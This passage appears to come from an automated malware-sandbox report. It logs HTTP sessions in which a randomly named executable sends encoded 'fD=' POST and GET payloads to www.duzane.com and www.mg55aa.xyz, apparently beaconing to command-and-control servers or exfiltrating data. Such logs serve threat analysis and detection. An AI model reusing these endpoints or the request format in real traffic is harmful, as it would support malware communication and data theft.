fD=604gVh/lGubfh/8TFsvTKkSErSTxfiHb7xTYxV9hUtP5FyFQPEkA8HplsTXpc7hNUnd9xAXSf7Asm542LDmJDYUFq2i5Q8NS2zS5x0OVBzPsfONi5SaS3/jcFmD2euzMPKAK7r0nfrRvjyIJSL0ZcPDmN7pXvuNMoBmxwuRQcAo0mbGaZS9d0DedFd4aT4AW33jsANebluphpCptYGiY8w3mtMmP
Jun 13, 2024 11:04:48.371084929 CEST	990	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Thu, 13 Jun 2024 09:04:47 GMT server: LiteSpeed location: https://www.duzane.com/6tsi/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49726	102.222.124.13	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:49.789634943 CEST	1740	OUT	POST /6tsi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.duzane.com Content-Length: 1239 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.duzane.com Referer: http://www.duzane.com/6tsi/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 36 30 34 67 56 68 2f 6c 47 75 62 66 68 2f 38 54 46 73 76 54 4b 6b 53 45 72 53 54 78 66 69 48 62 37 78 54 59 78 56 39 68 55 74 48 35 47 41 4e 51 49 58 63 41 39 48 70 6c 6c 7a 58 73 63 37 68 71 55 6a 35 35 78 41 72 6f 66 35 34 73 6b 61 67 32 4a 32 61 4a 4b 59 55 46 31 6d 69 30 64 63 4e 39 32 7a 44 79 78 33 32 56 42 7a 50 73 66 49 70 69 39 44 61 53 6b 76 6a 66 52 32 44 69 61 75 7a 77 50 4c 70 2f 37 72 77 52 66 62 78 76 6a 54 34 4a 51 35 4d 5a 55 50 44 67 4f 37 70 66 76 75 42 58 6f 43 43 39 77 74 4d 33 63 41 51 30 69 2f 58 31 45 53 39 44 77 46 57 74 4e 39 4d 43 4c 34 31 77 70 78 2f 61 46 4e 53 36 75 50 5a 36 70 69 46 70 56 56 48 38 6c 42 37 32 6b 37 57 45 37 6b 48 6f 34 77 6d 31 54 6a 4a 4d 39 44 4e 45 58 52 55 30 59 74 76 51 45 50 36 42 39 57 71 54 65 71 48 50 75 73 32 50 6f 61 2f 55 41 39 47 66 50 64 79 34 46 57 74 63 71 70 59 2f 67 78 55 6f 79 62 6a 37 4d 43 68 30 4e 57 45 4a 5a 32 6f 6e 66 36 34 38 4e 73 52 2b 41 69 74 50 4f 79 4b 59 69 66 65 42 54 63 31 65 6d 6c 31 42 47 35 54 43 2b 6c 63 [TRUNCATED] Data Ascii: fD=604gVh/lGubfh/8TFsvTKkSErSTxfiHb7xTYxV9hUtH5GANQIXcA9HpllzXsc7hqUj55xArof54skag2J2aJKYUF1mi0dcN92zDyx32VBzPsfIpi9DaSkvjfR2DiauzwPLp/7rwRfbxvjT4JQ5MZUPDgO7pfvuBXoCC9wtM3cAQ0i/X1ES9DwFWtN9MCL41wpx/aFNS6uPZ6piFpVVH8lB72k7WE7kHo4wm1TjJM9DNEXRU0YtvQEP6B9WqTeqHPus2Poa/UA9GfPdy4FWtcqpY/gxUoybj7MCh0NWEJZ2onf648NsR+AitPOyKYifeBTc1eml1BG5TC+lcNejQ/4sPPg6DdRRtOsXTwOKS5fX1CPestRRKBDyHNvRL6M+eTMLRYI2Kyz1dJE/XYS6CO0EJxtYOr1m6ljDYwykZiIO23mzIQyiQT/pV40d1m7WeqrQmFkTaXfJ0VQPVlFT7gvjOiuOFmc2/u5FQA4kX+ah+qa8f9w98MQezVFAD1ZV213sC+jcsw/IDdFgSTXYkKGVjaxkfhoa21xbKcvRfkE4vtUetGYGMvT/QLHftq7lAG2bUMAX3qL09+0gbPir+/c2a1bhbIVlxOU6IDWZ7F0+DgBrxFPvymtDjEe3sT3FjTimFo4/g4lWz4eWcKsiVqnwdFRBosfLpWRymdzXRA1Kfig3Rx/1NByhbcf1Llo6zCxxAGBa/Hp3RHNa9NttihsztsrBn0tnq8JTLH/J757nAklMEm6v2b0660UBhiBKI0QhgUwudcv43THmfgU49Hog+U5aKZWxonrbAeYCJtB3yBH4xbut8jja6700lClhgVAGte2sqn7OQYfPqsCEsBjQPfRbrJT2BVmLY2cbcTNyA0eWsNvR20n+Q1qAEISOA9FUCtxdkRqFdseu7rSXmY6h/NJaYNT2S8OGshRdUkd4Aw/nTagSbTTvskGo3Vm1VWN6+gNfKMzze6EE3wq6897XDYS30DeerIm7c6knW3q7C9TAB3B [TRUNCATED]
Jun 13, 2024 11:04:50.945491076 CEST	990	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Thu, 13 Jun 2024 09:04:50 GMT server: LiteSpeed location: https://www.duzane.com/6tsi/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49727	102.222.124.13	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:52.322406054 CEST	449	OUT	GET /6tsi/?fD=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.duzane.com Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 13, 2024 11:04:53.455060005 CEST	1140	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Thu, 13 Jun 2024 09:04:52 GMT server: LiteSpeed location: https://www.duzane.com/6tsi/?fD=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw==&j0=vTcl_2X8QJ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49728	35.241.34.216	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:04:59.092391968 CEST	703	OUT	POST /2c61/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.mg55aa.xyz Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.mg55aa.xyz Referer: http://www.mg55aa.xyz/2c61/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 63 4c 33 79 37 59 30 36 5a 76 66 73 33 7a 50 72 4b 58 65 63 35 70 6d 52 49 32 66 52 37 4b 51 61 6d 44 39 59 42 62 2b 48 6c 4c 58 54 6e 68 7a 6f 42 4b 36 36 4d 61 46 76 6e 34 52 7a 50 49 51 47 54 74 65 69 67 45 79 58 6d 31 42 56 61 37 4b 54 35 54 47 69 7a 55 58 41 62 67 45 54 51 57 72 52 7a 38 42 36 66 33 41 6c 6e 33 79 69 4b 57 34 2b 73 6e 71 72 67 42 74 71 61 73 66 39 68 46 6e 7a 6f 35 49 48 65 6f 59 7a 74 7a 59 4e 77 32 79 53 74 63 7a 55 71 74 41 75 56 32 48 69 62 79 72 51 33 45 53 6b 35 4e 4f 64 65 52 44 76 34 51 41 4a 36 70 55 59 4d 58 47 75 6c 42 61 35 59 39 4d 33 35 33 2b 64 6a 4a 63 3d Data Ascii: fD=cL3y7Y06Zvfs3zPrKXec5pmRI2fR7KQamD9YBb+HlLXTnhzoBK66MaFvn4RzPIQGTteigEyXm1BVa7KT5TGizUXAbgETQWrRz8B6f3Aln3yiKW4+snqrgBtqasf9hFnzo5IHeoYztzYNw2yStczUqtAuV2HibyrQ3ESk5NOdeRDv4QAJ6pUYMXGulBa5Y9M353+djJc=
Jun 13, 2024 11:04:59.864303112 CEST	326	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Thu, 13 Jun 2024 09:04:59 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49729	35.241.34.216	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:01.639981985 CEST	723	OUT	POST /2c61/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.mg55aa.xyz Content-Length: 223 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.mg55aa.xyz Referer: http://www.mg55aa.xyz/2c61/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 63 4c 33 79 37 59 30 36 5a 76 66 73 32 53 2f 72 46 51 79 63 6f 35 6d 53 55 6d 66 52 77 71 51 65 6d 44 35 59 42 61 71 58 6c 39 76 54 70 67 44 6f 41 4c 36 36 46 4b 46 76 2b 49 52 32 51 59 51 42 54 74 43 71 67 46 4f 58 6d 31 46 56 61 36 36 54 36 69 47 68 78 45 58 43 41 51 45 56 61 32 72 52 7a 38 42 36 66 33 55 50 6e 30 43 69 4e 6d 6f 2b 76 47 71 6b 2f 78 74 70 64 73 66 39 33 31 6d 30 6f 35 49 78 65 70 30 4b 74 31 55 4e 77 7a 32 53 74 4e 7a 58 67 74 41 73 49 6d 48 77 59 44 71 4c 39 46 4f 33 30 4d 6e 6b 66 6e 4b 55 77 47 74 6a 67 4c 63 77 66 33 71 57 31 53 53 4f 4a 4e 74 65 6a 55 75 74 39 65 4c 65 59 44 61 72 62 31 4b 33 47 62 54 78 51 58 34 69 74 68 6c 2b Data Ascii: fD=cL3y7Y06Zvfs2S/rFQyco5mSUmfRwqQemD5YBaqXl9vTpgDoAL66FKFv+IR2QYQBTtCqgFOXm1FVa66T6iGhxEXCAQEVa2rRz8B6f3UPn0CiNmo+vGqk/xtpdsf931m0o5Ixep0Kt1UNwz2StNzXgtAsImHwYDqL9FO30MnkfnKUwGtjgLcwf3qW1SSOJNtejUut9eLeYDarb1K3GbTxQX4ithl+
Jun 13, 2024 11:05:02.410602093 CEST	326	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Thu, 13 Jun 2024 09:05:02 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49730	35.241.34.216	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:04.176027060 CEST	1740	OUT	POST /2c61/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.mg55aa.xyz Content-Length: 1239 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.mg55aa.xyz Referer: http://www.mg55aa.xyz/2c61/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 63 4c 33 79 37 59 30 36 5a 76 66 73 32 53 2f 72 46 51 79 63 6f 35 6d 53 55 6d 66 52 77 71 51 65 6d 44 35 59 42 61 71 58 6c 2b 50 54 70 53 4c 6f 42 6f 69 36 58 61 46 76 68 34 52 33 51 59 51 63 54 74 61 75 67 46 43 48 6d 33 4e 56 63 5a 69 54 37 51 75 68 72 55 58 43 49 77 45 55 51 57 71 52 7a 34 74 2b 66 33 45 50 6e 30 43 69 4e 6a 73 2b 35 6e 71 6b 73 68 74 71 61 73 66 78 68 46 6d 51 6f 35 51 50 65 70 77 61 74 46 30 4e 77 54 6d 53 72 2f 62 58 6d 39 41 71 62 57 47 6a 59 47 79 75 39 46 53 46 30 4d 54 43 66 67 47 55 68 6e 55 4a 6c 4c 45 36 44 32 36 67 34 78 43 6a 52 64 64 6c 2b 55 71 72 69 5a 66 6d 45 41 69 4a 54 67 2f 32 4e 6f 65 45 42 52 38 75 6f 6c 41 76 66 2f 52 51 70 72 51 4e 51 57 79 4a 4d 68 6f 55 4c 6b 56 73 33 30 38 62 48 56 51 33 43 77 78 4c 71 72 52 77 37 33 68 47 36 45 6c 4b 65 42 56 2f 53 58 2b 6f 4d 67 63 53 54 73 76 78 63 58 30 77 67 33 50 2f 54 37 47 2b 57 50 6f 2f 63 50 72 74 37 61 76 30 6c 6c 6f 65 43 51 45 6d 4a 57 58 2b 6f 73 42 36 58 36 74 2b 41 75 56 30 66 75 71 72 51 36 6c [TRUNCATED] Data Ascii: fD=cL3y7Y06Zvfs2S/rFQyco5mSUmfRwqQemD5YBaqXl+PTpSLoBoi6XaFvh4R3QYQcTtaugFCHm3NVcZiT7QuhrUXCIwEUQWqRz4t+f3EPn0CiNjs+5nqkshtqasfxhFmQo5QPepwatF0NwTmSr/bXm9AqbWGjYGyu9FSF0MTCfgGUhnUJlLE6D26g4xCjRddl+UqriZfmEAiJTg/2NoeEBR8uolAvf/RQprQNQWyJMhoULkVs308bHVQ3CwxLqrRw73hG6ElKeBV/SX+oMgcSTsvxcX0wg3P/T7G+WPo/cPrt7av0lloeCQEmJWX+osB6X6t+AuV0fuqrQ6l5dWMYn5Bl7LVslhQFdg7pmnsJdNnRFRAQ/Meh+feWO0fatbrzg/01MpS0vFKwngI5Qb1FTCIgc4f/PhQfzUEk9iUtWc2OobtAColXSoWiqbexn8rXnMpeN9gHb7K2QFZMH/Z9vWyJoigl3fmcMQdvPpdnUFlaCB2Nlh/zxmWqIwBf5zTek/Qr3i9p3C6g5htj/LUiZQ3rCy1Fj/7CkqgryxcU7PsGpyjV40xnVNvq+nd4rCLVC/m3rYgjqOPYCVdU/O4YCHMUpV/RRqnPmQDrG1Ium5an4rPC465mBc9Y0J8x2EQfT2HQlOUWQdPfOAvB+3dkM5CoX+f5DvQ3Kk6l+hLhA16sfk3s2kNbItm97tgZoTW719jJFfJaliD/6/EiWDOQ/Dl5pGUG2K+6wxTm3jJrIDEhmbyuXirKKKDzWnTRaZojtvfti2Y7S3mdJVMwHKaFiQSEQ9NBT8942W+I4+d1bWqiI2MIH2Kbgwu5ZAUlS8ipKH8LFspsj0I+K/BxzvMfeXLtvQU7ZHxtZfrslSVBXNV3y97LPxm+75qwoiwMy0yJjaOU158JtgZMR0K99pGWQgkkNT0co+PI2sf1ybVa92MwJsatwLuDnKd38PeM5VQudjsJfORx7Sj7tn3Kj8i5u2AnW+Z5WMS/IUpOAfPHBROtsHbGM [TRUNCATED]
Jun 13, 2024 11:05:04.940085888 CEST	326	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Thu, 13 Jun 2024 09:05:04 GMT Content-Type: text/html Content-Length: 157 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49731	35.241.34.216	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:06.712004900 CEST	449	OUT	GET /2c61/?fD=RJfS4vARZYm/oi22NSuVxsKXUXvAzLUuwV1pBI27iejWxHvYHo2LN7gu8qRYW6QqNtSAiHHGlyBTLaey7TeG8lKmZ3wdB0uWw8RQPkcPoCC9P3J1+WeEqjNfAM7KpTz+0w==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.mg55aa.xyz Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 13, 2024 11:05:07.488886118 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 13 Jun 2024 09:05:07 GMT Content-Type: text/html Content-Length: 5161 Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT Vary: Accept-Encoding ETag: "65a4939c-1429" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 [TRUNCATED] Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new 